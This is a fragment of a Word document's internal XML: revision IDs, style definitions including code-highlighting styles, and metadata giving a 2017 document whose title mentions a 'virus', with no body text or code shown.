    <w:rsid w:val="008060A8"/>
    <w:rsid w:val="00862BCD"/>
    <w:rsid w:val="00876384"/>
    <w:rsid w:val="008B38C3"/>
    <w:rsid w:val="00913713"/>
    <w:rsid w:val="00924D5B"/>
    <w:rsid w:val="00954C18"/>
    <w:rsid w:val="0096355A"/>
    <w:rsid w:val="009A60EC"/>
    <w:rsid w:val="009D08D5"/>
    <w:rsid w:val="009F0B77"/>
    <w:rsid w:val="00A10B28"/>
    <w:rsid w:val="00A14775"/>
    <w:rsid w:val="00A373AD"/>
    <w:rsid w:val="00A54B2A"/>
    <w:rsid w:val="00AB727A"/>
    <w:rsid w:val="00AC0C57"/>
    <w:rsid w:val="00AC3799"/>
    <w:rsid w:val="00AD5501"/>
    <w:rsid w:val="00AF4449"/>
    <w:rsid w:val="00B24F74"/>
    <w:rsid w:val="00B34684"/>
    <w:rsid w:val="00B57101"/>
    <w:rsid w:val="00B75BA0"/>
    <w:rsid w:val="00B81116"/>
    <w:rsid w:val="00B851F5"/>
    <w:rsid w:val="00BA4345"/>
    <w:rsid w:val="00C05152"/>
    <w:rsid w:val="00C12B3C"/>
    <w:rsid w:val="00C857D7"/>
    <w:rsid w:val="00CC3687"/>
    <w:rsid w:val="00D02BDA"/>
    <w:rsid w:val="00D02FE8"/>
    <w:rsid w:val="00D60E74"/>
    <w:rsid w:val="00DC777D"/>
    <w:rsid w:val="00E0159B"/>
    <w:rsid w:val="00E040AA"/>
    <w:rsid w:val="00E20A2A"/>
    <w:rsid w:val="00E55B22"/>
    <w:rsid w:val="00E716F7"/>
    <w:rsid w:val="00EA27AC"/>
    <w:rsid w:val="00ED1C3F"/>
    <w:rsid w:val="00EF66D6"/>
    <w:rsid w:val="00F169E7"/>
    <w:rsid w:val="00F266B9"/>
    <w:rsid w:val="00FC0176"/>
    <w:rsid w:val="00FE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771A3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DE548844-FC62-4BB9-AEED-B55B0351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66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4345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BA4345"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00EF66D6"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EF66D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F66D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F66D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F66D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F66D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6">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00286FCB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3B4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B455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B45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B4551"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00370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c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00AF4449"/>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00B851F5"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E716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E716F7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E716F7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E716F7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E71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通过迷人的病毒吸引您的读者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7729E8-332C-4D1B-B593-12125095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1</Pages>
  <Words>921</Words>
  <Characters>5255</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>43</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop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F病毒</dc:title>
  <dc:subject/>
  <dc:creator>徐世超</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>徐世超</cp:lastModifiedBy>
  <cp:revision>146</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-01-01T11:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-15T07:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>